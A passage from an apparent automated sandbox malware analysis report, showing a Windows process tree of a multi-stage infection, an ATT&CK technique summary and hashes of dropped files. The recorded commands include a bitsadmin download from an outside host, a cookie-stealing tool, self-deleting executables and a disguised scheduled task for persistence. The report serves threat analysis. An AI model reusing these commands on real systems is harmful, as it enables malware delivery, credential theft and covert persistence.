                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  8⤵
                                                                                                                    PID:5384
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ykxcmhal.njj\google-game.exe & exit
                                                                                                                6⤵
                                                                                                                  PID:7036
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ykxcmhal.njj\google-game.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\ykxcmhal.njj\google-game.exe
                                                                                                                    7⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:2912
                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                      "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                                                                                      8⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:4704
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x1vwxzvw.beq\y1.exe & exit
                                                                                                                  6⤵
                                                                                                                    PID:5036
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\x1vwxzvw.beq\y1.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\x1vwxzvw.beq\y1.exe
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5468
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a1cmFxYejo.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a1cmFxYejo.exe"
                                                                                                                        8⤵
                                                                                                                          PID:4248
                                                                                                                          • C:\Users\Admin\AppData\Roaming\1620130069512.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\1620130069512.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620130069512.txt"
                                                                                                                            9⤵
                                                                                                                              PID:4176
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\a1cmFxYejo.exe"
                                                                                                                              9⤵
                                                                                                                                PID:5500
                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                  ping 127.0.0.1 -n 3
                                                                                                                                  10⤵
                                                                                                                                  • Runs ping.exe
                                                                                                                                  PID:6036
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\x1vwxzvw.beq\y1.exe"
                                                                                                                              8⤵
                                                                                                                                PID:7012
                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                  timeout /T 10 /NOBREAK
                                                                                                                                  9⤵
                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                  PID:4284
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\42liyroc.2ss\askinstall39.exe & exit
                                                                                                                            6⤵
                                                                                                                              PID:5848
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\42liyroc.2ss\askinstall39.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\42liyroc.2ss\askinstall39.exe
                                                                                                                                7⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:6264
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ejaxbs20.new\setup.exe & exit
                                                                                                                              6⤵
                                                                                                                                PID:6036
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ejaxbs20.new\setup.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\ejaxbs20.new\setup.exe
                                                                                                                                  7⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:6948
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ejaxbs20.new\setup.exe"
                                                                                                                                    8⤵
                                                                                                                                      PID:6864
                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                        ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                        9⤵
                                                                                                                                        • Runs ping.exe
                                                                                                                                        PID:4800
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bupd2lmy.u22\SunLabsPlayer.exe /S & exit
                                                                                                                                  6⤵
                                                                                                                                    PID:6724
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bupd2lmy.u22\SunLabsPlayer.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\bupd2lmy.u22\SunLabsPlayer.exe /S
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      PID:6484
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi10C.tmp\tempfile.ps1"
                                                                                                                                        8⤵
                                                                                                                                          PID:2352
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi10C.tmp\tempfile.ps1"
                                                                                                                                          8⤵
                                                                                                                                            PID:6824
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi10C.tmp\tempfile.ps1"
                                                                                                                                            8⤵
                                                                                                                                              PID:4792
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                9⤵
                                                                                                                                                  PID:1916
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi10C.tmp\tempfile.ps1"
                                                                                                                                                8⤵
                                                                                                                                                  PID:5892
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi10C.tmp\tempfile.ps1"
                                                                                                                                                  8⤵
                                                                                                                                                    PID:1168
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi10C.tmp\tempfile.ps1"
                                                                                                                                                    8⤵
                                                                                                                                                      PID:4176
                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi10C.tmp\tempfile.ps1"
                                                                                                                                                      8⤵
                                                                                                                                                        PID:4588
                                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                                                                        8⤵
                                                                                                                                                        • Download via BitsAdmin
                                                                                                                                                        PID:4572
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hq0acslq.p5b\005.exe & exit
                                                                                                                                                    6⤵
                                                                                                                                                      PID:5700
                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        7⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4976
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\hq0acslq.p5b\005.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\hq0acslq.p5b\005.exe
                                                                                                                                                        7⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:6808
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lwt3g1ef.4ow\ifhwwyy.exe & exit
                                                                                                                                                      6⤵
                                                                                                                                                        PID:3644
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lwt3g1ef.4ow\ifhwwyy.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\lwt3g1ef.4ow\ifhwwyy.exe
                                                                                                                                                          7⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:1392
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                            8⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5536
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                            8⤵
                                                                                                                                                              PID:6760
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s135zct3.pcj\toolspab1.exe & exit
                                                                                                                                                          6⤵
                                                                                                                                                            PID:5680
                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:5660
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\s135zct3.pcj\toolspab1.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\s135zct3.pcj\toolspab1.exe
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                              PID:6492
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\s135zct3.pcj\toolspab1.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\s135zct3.pcj\toolspab1.exe
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:6380
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2b-493b5-aa5-ba3ba-b593106a2ded7\Jaduludiga.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\2b-493b5-aa5-ba3ba-b593106a2ded7\Jaduludiga.exe"
                                                                                                                                                            5⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Checks computer location settings
                                                                                                                                                            PID:3200
                                                                                                                                                    • C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe"
                                                                                                                                                      2⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                      PID:1116
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\2635928.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\2635928.exe"
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:1860
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7042057.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7042057.exe"
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                        PID:4568
                                                                                                                                                        • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                          "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                          4⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4860
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7574130.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7574130.exe"
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:4748
                                                                                                                                                    • C:\Program Files (x86)\Microsoft Data\Versium Research\dp81GdX0OrCQ.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft Data\Versium Research\dp81GdX0OrCQ.exe"
                                                                                                                                                      2⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                      PID:2024
                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4168
                                                                                                                                                      • C:\Program Files (x86)\Microsoft Data\Versium Research\askinstall38.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft Data\Versium Research\askinstall38.exe"
                                                                                                                                                        2⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:1276
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                          3⤵
                                                                                                                                                            PID:5116
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill /f /im chrome.exe
                                                                                                                                                              4⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              PID:4256
                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                        1⤵
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                        PID:696
                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                          2⤵
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                          PID:3488
                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                          2⤵
                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                          PID:5072
                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                        1⤵
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:7084
                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                        1⤵
                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                        PID:2080
                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                        1⤵
                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        PID:6088
                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding A7E826A306D15B7BA825A06873F1CC63 C
                                                                                                                                                          2⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:4268
                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 348D7ECA1011072B334EECE9C858DB9E
                                                                                                                                                          2⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:4728
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                            3⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:4580
                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 3AC8779356DF86DFD834DBE7063363DD E Global\MSI0000
                                                                                                                                                          2⤵
                                                                                                                                                            PID:7048
                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                          1⤵
                                                                                                                                                          • Modifies registry class
                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                          PID:7072
                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                          1⤵
                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                          • Modifies registry class
                                                                                                                                                          PID:5024
                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                          1⤵
                                                                                                                                                          • Modifies registry class
                                                                                                                                                          PID:5124
                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                          1⤵
                                                                                                                                                          • Modifies registry class
                                                                                                                                                          PID:2124
                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                          1⤵
                                                                                                                                                            PID:4308
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\D08F.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\D08F.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5724
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\D08F.exe
                                                                                                                                                                "{path}"
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:6416
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe"
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:6628
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      "schtasks.exe" /create /tn UpdateWindows /tr "C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe" /st 12:11 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:5336
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\D40B.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\D40B.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:6976
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\DA84.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\DA84.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:3012
                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4560
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\E3AD.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\E3AD.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:5936
                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:4824
                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:7032
                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:5572
                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:5708
                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:5060
                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:2404
                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:6216
                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:7092
                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:6796

                                                                                                                                                                                          Network

                                                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                          Execution

                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                          1
                                                                                                                                                                                          T1053

                                                                                                                                                                                          Persistence

                                                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                                                          1
                                                                                                                                                                                          T1060

                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                          1
                                                                                                                                                                                          T1053

                                                                                                                                                                                          BITS Jobs

                                                                                                                                                                                          1
                                                                                                                                                                                          T1197

                                                                                                                                                                                          Privilege Escalation

                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                          1
                                                                                                                                                                                          T1053

                                                                                                                                                                                          Defense Evasion

                                                                                                                                                                                          Modify Registry

                                                                                                                                                                                          3
                                                                                                                                                                                          T1112

                                                                                                                                                                                          BITS Jobs

                                                                                                                                                                                          1
                                                                                                                                                                                          T1197

                                                                                                                                                                                          Install Root Certificate

                                                                                                                                                                                          1
                                                                                                                                                                                          T1130

                                                                                                                                                                                          Credential Access

                                                                                                                                                                                          Credentials in Files

                                                                                                                                                                                          4
                                                                                                                                                                                          T1081

                                                                                                                                                                                          Discovery

                                                                                                                                                                                          Software Discovery

                                                                                                                                                                                          1
                                                                                                                                                                                          T1518

                                                                                                                                                                                          Query Registry

                                                                                                                                                                                          5
                                                                                                                                                                                          T1012

                                                                                                                                                                                          System Information Discovery

                                                                                                                                                                                          6
                                                                                                                                                                                          T1082

                                                                                                                                                                                          Peripheral Device Discovery

                                                                                                                                                                                          2
                                                                                                                                                                                          T1120

                                                                                                                                                                                          Remote System Discovery

                                                                                                                                                                                          1
                                                                                                                                                                                          T1018

                                                                                                                                                                                          Collection

                                                                                                                                                                                          Data from Local System

                                                                                                                                                                                          4
                                                                                                                                                                                          T1005

                                                                                                                                                                                          Command and Control

                                                                                                                                                                                          Web Service

                                                                                                                                                                                          1
                                                                                                                                                                                          T1102

                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                          Downloads

                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe
                                                                                                                                                                                            MD5

                                                                                                                                                                                            6dae43e5255fd03d32db83c9ed731f19

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            5c2a68a017fe5f3c65f59ccdac2ad0b0b69cdd69

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            5800b5569e81d58fd441a585dff6817cf63c875881874eca2d7ff22d547f770e

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            7d0d81077504ffe604e3a526e1bf2edeb714c5b9f460657d75fb063ae41e11c44a193664c8a4b3ba0638521070a94b7b0eb53bdd416b923cf53d190708ef1d12

                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe
                                                                                                                                                                                            MD5

                                                                                                                                                                                            6dae43e5255fd03d32db83c9ed731f19

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            5c2a68a017fe5f3c65f59ccdac2ad0b0b69cdd69

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            5800b5569e81d58fd441a585dff6817cf63c875881874eca2d7ff22d547f770e

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            7d0d81077504ffe604e3a526e1bf2edeb714c5b9f460657d75fb063ae41e11c44a193664c8a4b3ba0638521070a94b7b0eb53bdd416b923cf53d190708ef1d12

                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe
                                                                                                                                                                                            MD5

                                                                                                                                                                                            1e09b73afa67d8bfe8591eb605cef0e3

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            147fdec45342a0e069dd1aeea2c109440894bef9

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            431c13d939d7460db6ec5f524145a93fae7711d61344fbf1898cea7895480286

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            b74516b1f3d241790537aaaaf9c8b90bd2edbcf2e7693c166b11c260d6689b9e0f2a9c25b5e6787d6c717eb9ad64605b783bdd1ac09a9b50f211112007c27a49

                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe
                                                                                                                                                                                            MD5

                                                                                                                                                                                            1e09b73afa67d8bfe8591eb605cef0e3

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            147fdec45342a0e069dd1aeea2c109440894bef9

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            431c13d939d7460db6ec5f524145a93fae7711d61344fbf1898cea7895480286

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            b74516b1f3d241790537aaaaf9c8b90bd2edbcf2e7693c166b11c260d6689b9e0f2a9c25b5e6787d6c717eb9ad64605b783bdd1ac09a9b50f211112007c27a49

                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe
                                                                                                                                                                                            MD5

                                                                                                                                                                                            86e5afea87de8d8c58f5af9e35cc695a

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            99981daa6c225c917a1461fbb85f4ca5bd0add80

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            6ac9d38a6cb0394484c05cb1eb24c07e2f0ec48eb64cd788f0cff632f86e7935

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            1990629e80a0cbc3bb9b244c27be4c754d58db8b047e174c8caf10db6796db263b199c3b91397aade3bd92595bb5955f5424d5dcd57d69ac6d3e73a55e3ad5df

                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe
                                                                                                                                                                                            MD5

                                                                                                                                                                                            86e5afea87de8d8c58f5af9e35cc695a

                                                                                                                                                                                            SHA1

